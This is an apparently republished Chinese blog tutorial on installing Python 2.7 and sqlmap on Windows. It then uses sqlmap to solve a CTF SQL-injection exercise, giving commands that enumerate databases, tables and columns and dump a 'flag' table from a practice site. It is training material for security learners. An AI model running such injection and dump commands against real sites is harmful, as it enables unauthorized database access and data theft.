sqlmap安装及实例应用

本文主要是介绍sqlmap安装及实例应用，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

##sqlmap要在python环境下使用。且是python2.7版本（亲测3x版本sqlmap安装不成功）

一.安装python2.7

1.下载

    点击打开官网

2.安装

    

    修改安装目录之后，点击add python.exe to path. 可以避免后面再配置环境变量。

    

等待安装完成。

3.测试

安装完成之后，重启电脑

打开命令提示符，输入 python，看python是否安装成功。

二.安装sqlmap

1.点击进入官网下载

2.python安装目录下新建一个文件夹并命名为sqlmap，将下载好的sqlmap安装包解压到sqlmap中

3.在桌面新建快捷方式，键入对象位置为 cmd ,取名为 sqlmap

选中sqlmap快捷方式右键配置sqlmap快捷方式的属性，复制sqlmap文件夹所在位置，将起始位置改为sqlmap文件所在位置，然后确定

4.测试

双击打开这个快捷方式

输入 sqlmap.py -h   如图所示即为安装成功

三.sqlmap在CTF题中的简单应用

            实验吧   简单的sql注入

       链接：http://ctf5.shiyanbar.com/web/index_3.php

    

    尝试用sqlmap跑。

输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dbs

//语句  --dbs    #列出所有数据库

    

输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tables -D web1      

//语句 --tables  -D " "    #列出指定数据库中的表

    

输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --columns -T flag -D web1      

//语句--columns -T "user" -D "mysql"  #列出mysql数据库中的user表的所有字段

    

输入sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --dump -T flag -D web1     

    得到flag

  

这篇关于sqlmap安装及实例应用的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

---